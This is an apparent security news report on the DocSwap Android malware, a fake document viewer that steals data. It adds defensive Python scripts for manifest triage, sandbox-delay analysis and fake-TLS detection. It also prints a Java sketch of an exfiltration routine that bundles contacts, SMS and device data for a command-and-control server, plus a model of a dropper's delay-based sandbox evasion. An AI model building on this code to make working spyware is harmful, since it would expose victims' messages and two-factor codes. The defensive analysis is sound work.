A sophisticated malware campaign dubbed “DocSwap” has emerged targeting Android users globally by disguising itself as a legitimate document security and viewing application.
The malware leverages social engineering tactics to trick users into installing what appears to be a productivity tool while covertly establishing persistence on victims’ devices and exfiltrating sensitive information.
Initial infection typically occurs through phishing emails or compromised websites promoting the fake document viewer as a solution for securely opening PDF and Office files.
Upon installation, DocSwap requests extensive permissions, including access to contacts, storage, and SMS messaging capabilities.
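That permission set is the first thing a triage script can check. The following Python script is an added example (not code from the original report or from the S2W analysis) that runs over a decoded text manifest such as apktool produces: it flags an app that declares itself a PDF/Office viewer yet asks for SMS or contact permissions, and any receiver that registers for SMS_RECEIVED with a high priority. Both manifests embedded in it are constructed for illustration; the package names, labels and class names are made up.

```python
import xml.etree.ElementTree as ET

# Android attributes live in this namespace; ElementTree needs the Clark form.
A = "{http://schemas.android.com/apk/res/android}"

# Constructed manifest (not DocSwap's real manifest): a PDF viewer that also
# asks for SMS and contacts and registers a high-priority SMS receiver.
SUSPECT_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.docviewer">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application android:label="Secure Doc Viewer">
    <activity android:name=".ViewerActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <category android:name="android.intent.category.DEFAULT"/>
        <data android:mimeType="application/pdf"/>
      </intent-filter>
    </activity>
    <receiver android:name=".SmsReceiver" android:exported="true">
      <intent-filter android:priority="999">
        <action android:name="android.provider.Telephony.SMS_RECEIVED"/>
      </intent-filter>
    </receiver>
  </application>
</manifest>
"""

# Constructed benign counterpart: same viewer, only the permission it needs.
BENIGN_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.pdfreader">
  <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE"/>
  <application android:label="PDF Reader">
    <activity android:name=".ViewerActivity">
      <intent-filter>
        <action android:name="android.intent.action.VIEW"/>
        <data android:mimeType="application/pdf"/>
      </intent-filter>
    </activity>
  </application>
</manifest>
"""

SMS_PERMS = {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS",
             "android.permission.SEND_SMS"}
CONTACT_PERMS = {"android.permission.READ_CONTACTS", "android.permission.WRITE_CONTACTS"}
DOC_MIME_PREFIXES = ("application/pdf", "application/msword",
                     "application/vnd.openxmlformats-officedocument",
                     "application/vnd.ms-")
SMS_RECEIVED = "android.provider.Telephony.SMS_RECEIVED"


def filter_actions(intent_filter):
    return {a.get(A + "name") for a in intent_filter.findall("action")}


def is_document_viewer(root):
    """True if any activity handles VIEW for PDF/Office MIME types."""
    for act in root.iter("activity"):
        for flt in act.findall("intent-filter"):
            if "android.intent.action.VIEW" not in filter_actions(flt):
                continue
            for data in flt.findall("data"):
                if (data.get(A + "mimeType") or "").startswith(DOC_MIME_PREFIXES):
                    return True
    return False


def triage_manifest(xml_text):
    """Return findings (strings) that make a 'document viewer' worth a closer look."""
    root = ET.fromstring(xml_text)
    perms = {p.get(A + "name") for p in root.findall("uses-permission")}
    findings = []
    if is_document_viewer(root):
        if perms & SMS_PERMS:
            findings.append("viewer requests SMS permissions: "
                            + ", ".join(sorted(perms & SMS_PERMS)))
        if perms & CONTACT_PERMS:
            findings.append("viewer requests contact access: "
                            + ", ".join(sorted(perms & CONTACT_PERMS)))
    for rcv in root.iter("receiver"):
        for flt in rcv.findall("intent-filter"):
            if SMS_RECEIVED in filter_actions(flt):
                prio = int(flt.get(A + "priority", "0"))
                findings.append(f"receiver {rcv.get(A + 'name')} listens for "
                                f"SMS_RECEIVED with priority {prio}")
    return findings


if __name__ == "__main__":
    for name, text in (("suspect", SUSPECT_MANIFEST), ("benign", BENIGN_MANIFEST)):
        print(name, triage_manifest(text) or ["no findings"])
```

The SMS_RECEIVED receiver check matters independently of the permission list: a viewer that has a reason to read SMS (there is none) still has no reason to register a high-priority receiver, which is the pattern used to see one-time codes before the messaging app does.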
S2W Security analysts noted that once installed, the malware establishes a connection to command-and-control servers using an encrypted protocol to bypass standard detection methods.
Their analysis revealed a significant spike in infections across Asia, Europe, and North America in the past three weeks.
The malware obfuscates its malicious code to hinder static analysis.
When the application is opened it genuinely displays documents, while its payload runs in the background; to the average user nothing looks amiss, which makes detection particularly challenging.
The core of DocSwap's functionality is an exfiltration routine along the lines of the following method (shown in Java; it uses Android's AsyncTask rather than native code to run the upload off the main thread):

    private void exfiltrateData() {
        // Gather everything the granted permissions expose: device
        // identifiers, the contact list and the SMS inbox.
        final String deviceInfo = getDeviceInfo();
        final String contactsList = getContacts();
        final String smsData = getMessages();

        // Upload on a background thread so the document viewer stays
        // responsive while the data leaves the device.
        new AsyncTask<Void, Void, Void>() {
            @Override
            protected Void doInBackground(Void... params) {
                // Encrypt the bundle before it goes to the C2 server.
                sendToC2Server(encryptData(deviceInfo + contactsList + smsData));
                return null;
            }
        }.execute();
    }
Attack Analysis
The malware uses a multi-stage infection process that begins with a dropper component. This first stage appears benign but carries an encrypted second-stage payload, which it decrypts only after a predetermined delay.
The delay is meant to outlast the fixed observation window of the sandboxes and dynamic scanning tools commonly used by security researchers, so the sample looks clean for as long as it is being watched.
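To make the evasion and its countermeasure concrete, the following Python model is an added example (not DocSwap's code and not tooling from the report). A dropper idles until a delay has elapsed and only then decrypts its second stage; a sandbox with a fixed wall-clock budget never sees the payload, while a sandbox that fast-forwards sleeps does. The cipher, key, plaintext and the sleep-based polling loop are all constructed stand-ins; the page does not describe the real scheme.

```python
import hashlib

STAGE2_PLAINTEXT = b"stage2: harvest contacts and SMS, post to C2"  # constructed stand-in
KEY = b"constructed-demo-key"


def xor_keystream(data, key):
    """Constructed stand-in cipher (SHA-256 counter keystream XOR).
    Symmetric, so the same call encrypts and decrypts."""
    blocks = (hashlib.sha256(key + i.to_bytes(4, "big")).digest()
              for i in range(len(data) // 32 + 1))
    stream = b"".join(blocks)
    return bytes(a ^ b for a, b in zip(data, stream))


ENCRYPTED_STAGE2 = xor_keystream(STAGE2_PLAINTEXT, KEY)


class SandboxClock:
    """Clock as seen by the sample. The sandbox owns it and can either let
    sleeps cost real wall time (naive) or fast-forward them (skip_sleeps)."""

    def __init__(self, wall_budget_s, skip_sleeps):
        self.now = 0.0           # monotonic time the sample reads
        self.wall = 0.0          # wall time the sandbox has actually spent
        self.wall_budget_s = wall_budget_s
        self.skip_sleeps = skip_sleeps

    def sleep(self, seconds):
        self.now += seconds
        if not self.skip_sleeps:
            self.wall += seconds
            if self.wall > self.wall_budget_s:
                raise TimeoutError("sandbox observation window exhausted")


class DelayedDropper:
    """Models the dropper: benign until delay_s has elapsed, then decrypts stage 2."""

    def __init__(self, blob, key, delay_s, clock):
        self.blob, self.key, self.delay_s, self.clock = blob, key, delay_s, clock

    def run(self):
        started = self.clock.now
        while self.clock.now - started < self.delay_s:
            self.clock.sleep(1.0)            # idle polling, nothing malicious yet
        return xor_keystream(self.blob, self.key)


def observe(delay_s, wall_budget_s, skip_sleeps):
    """Run the dropper under a sandbox policy; return what the analyst sees."""
    clock = SandboxClock(wall_budget_s, skip_sleeps)
    dropper = DelayedDropper(ENCRYPTED_STAGE2, KEY, delay_s, clock)
    try:
        return dropper.run().decode()
    except TimeoutError:
        return "no second stage observed"


if __name__ == "__main__":
    # A 10-minute delay against a 60 s window: the evasion works.
    print(observe(600, 60, skip_sleeps=False))
    # Same sample, but the sandbox fast-forwards sleeps: stage 2 appears at once.
    print(observe(600, 60, skip_sleeps=True))
```

In practice the delay may be keyed to a clock the sandbox does not control (a server-side timestamp, an alarm, a count of reboots), so sleep skipping is a first measure, not a complete one; a static look for an encrypted asset plus a dynamic class loader is the complementary check.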
Analysis of the network traffic shows that DocSwap communicates with servers primarily located in Eastern Europe and Southeast Asia, using a custom protocol that mimics legitimate HTTPS traffic.
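A protocol that only borrows port 443 usually fails the cheapest possible check: the first client bytes are not a well-formed TLS ClientHello. The following Python script is an added example (not from the report) that validates the TLS record and handshake headers of a flow's first client-to-server bytes and flags flows on TLS ports that do not pass. The sample flows, the IP address and the JSON-style beacon are constructed; the check assumes the ClientHello fits in the first record, which is how real TLS stacks send it.

```python
import os


def check_client_hello(first_bytes):
    """Validate TLS record + handshake headers of a flow's first client bytes.
    Returns (ok, reason). Assumes the ClientHello is carried whole in the
    first record, which real TLS stacks do."""
    if len(first_bytes) < 11:
        return False, "too short for a TLS record header plus ClientHello"
    ctype, major, minor = first_bytes[0], first_bytes[1], first_bytes[2]
    if ctype != 0x16:
        return False, f"record type 0x{ctype:02x} is not handshake (0x16)"
    if major != 3 or minor not in (1, 2, 3):
        return False, f"record version {major}.{minor} is not TLS 1.0-1.2 framing"
    rec_len = int.from_bytes(first_bytes[3:5], "big")
    if rec_len == 0 or rec_len > 16384:
        return False, f"record length {rec_len} out of range"
    if first_bytes[5] != 0x01:
        return False, f"handshake type 0x{first_bytes[5]:02x} is not ClientHello"
    hs_len = int.from_bytes(first_bytes[6:9], "big")
    if hs_len + 4 != rec_len:
        return False, "handshake length does not match record length"
    if first_bytes[9] != 3 or first_bytes[10] not in (1, 2, 3):
        return False, "client_version is not a TLS version"
    return True, "well-formed ClientHello"


def build_client_hello():
    """Constructed minimal ClientHello (TLS 1.2, two cipher suites, no extensions)."""
    body = (b"\x03\x03" + os.urandom(32) + b"\x00"   # version, random, empty session id
            + b"\x00\x04\x13\x01\x13\x02"           # cipher suites
            + b"\x01\x00"                           # compression methods: null
            + b"\x00\x00")                          # extensions length 0
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body
    return b"\x16\x03\x01" + len(handshake).to_bytes(2, "big") + handshake


# Constructed flows: (dst_port, first client-to-server bytes). Flows 2 and 3
# model a custom protocol that only borrows port 443 and a TLS-looking prefix.
SAMPLE_FLOWS = [
    (443, build_client_hello()),
    (443, b"POST /gate HTTP/1.1\r\nHost: 203.0.113.5\r\n\r\n"),
    (443, b"\x16\x03\x01\x00\x2a" + b'{"id":"a1","cmd":"beacon"}' + b"\x00" * 14),
    (8443, b"\x17\x03\x03\x00\x20" + os.urandom(32)),  # app data with no handshake first
]

TLS_PORTS = {443, 8443}


def flag_fake_tls(flows):
    """Return [(port, reason)] for flows on TLS ports that are not real TLS."""
    hits = []
    for port, data in flows:
        if port in TLS_PORTS:
            ok, reason = check_client_hello(data)
            if not ok:
                hits.append((port, reason))
    return hits


if __name__ == "__main__":
    for port, reason in flag_fake_tls(SAMPLE_FLOWS):
        print(f"port {port}: {reason}")
```

The caveat is that a more careful mimic can emit a structurally valid ClientHello and then speak its own protocol inside the records; header validation only catches the lazy case. For the rest, fingerprint the handshake (JA3/JA4), check that a server certificate is actually presented, and compare the SNI against the destination.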
The most concerning capability is that DocSwap intercepts incoming SMS messages and forwards them to the attackers, including one-time codes, which defeats two-factor authentication for any account whose second factor is delivered by text.
Security experts recommend removing any suspicious document viewing application immediately and running a full device scan with reputable mobile security software.
Users should also keep Google Play Protect enabled and avoid sideloading applications from unknown sources.